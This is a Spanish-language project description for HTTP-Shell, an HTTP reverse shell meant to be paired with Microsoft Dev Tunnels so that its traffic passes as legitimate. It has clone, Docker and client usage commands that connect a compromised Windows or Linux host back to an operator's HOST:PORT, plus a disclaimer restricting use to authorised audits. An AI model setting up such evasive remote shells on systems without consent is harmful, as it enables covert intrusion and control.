
Shell inversa HTTP multiplataforma que proporciona una interfaz tipo shell sobre HTTP, con carga/descarga de archivos, historial de comandos, reconexión automática y soporte para sudo, diseñada para su uso con Microsoft Dev Tunnels.

HTTP-Shell es una Reverse Shell multiplataforma. Esta herramienta te ayuda a obtener una interfaz tipo shell en una conexión inversa sobre HTTP. A diferencia de otras reverse shells, el objetivo principal de la herramienta es utilizarla junto con Microsoft Dev Tunnels, para obtener una conexión lo más cercana posible a una legítima.
Esta shell no es completamente interactiva, pero muestra cualquier error en pantalla (tanto en Windows como en Linux), es capaz de subir y descargar archivos, tiene historial de comandos, limpieza de terminal (incluso con CTRL+L), reconexión automática, movimiento entre directorios y soporta sudo (o sudo su) en sistemas basados en Linux.
Se recomienda clonar el repositorio completo o descargar el archivo zip. Puedes hacerlo ejecutando el siguiente comando:
git clone https://github.com/JoelGMSec/HTTP-Shell
# Servidor
_ _ _____ _____ ____ ____ _ _ _
| | | |_ _|_ _| _ \ / ___|| |__ ___| | |
| |_| | | | | | | |_) |___\___ \| "_ \ / _ \ | |
| _ | | | | | | __/_____|__) | | | | __/ | |
|_| |_| |_| |_| |_| |____/|_| |_|\___|_|_|
---------------- by @JoelGMSec -----------------
[!] Uso: HTTP-Server.py [PUERTO]
# CLI Linux
[!] Uso: ./HTTP-Client.sh -c [HOST:PUERTO] -s [SLEEP] (opcional)
# CLI Windows
[!] Uso: .\HTTP-Client.ps1 -c [HOST:PUERTO] -s [SLEEP] (opcional)
Si deseas ejecutar el servidor en un contenedor Docker:
docker build -t http-shell https://github.com/JoelGMSec/HTTP-Shell.git#main
docker run -it --rm -p 8080:8080 --name http-shell http-shell
https://darkbyte.net/obteniendo-shells-con-microsoft-dev-tunnels
Este proyecto está licenciado bajo la licencia GNU 3.0 - consulta el archivo LICENSE para más detalles.
Idea original y parte del código por Héctor de Armas Padrón (@3v4si0n)
Esta herramienta ha sido creada y diseñada desde cero por Joel Gámez Molina (@JoelGMSec).
Este software no ofrece ningún tipo de garantía. Su uso es exclusivo para entornos educativos y/o auditorías de seguridad con el correspondiente consentimiento del cliente. No me hago responsable de su mal uso ni de cualquier posible daño causado por el mismo.
Para más información, puedes encontrarme en Twitter como @JoelGMSec y en mi blog darkbyte.net.
Puedes apoyar mi trabajo invitándome a un café: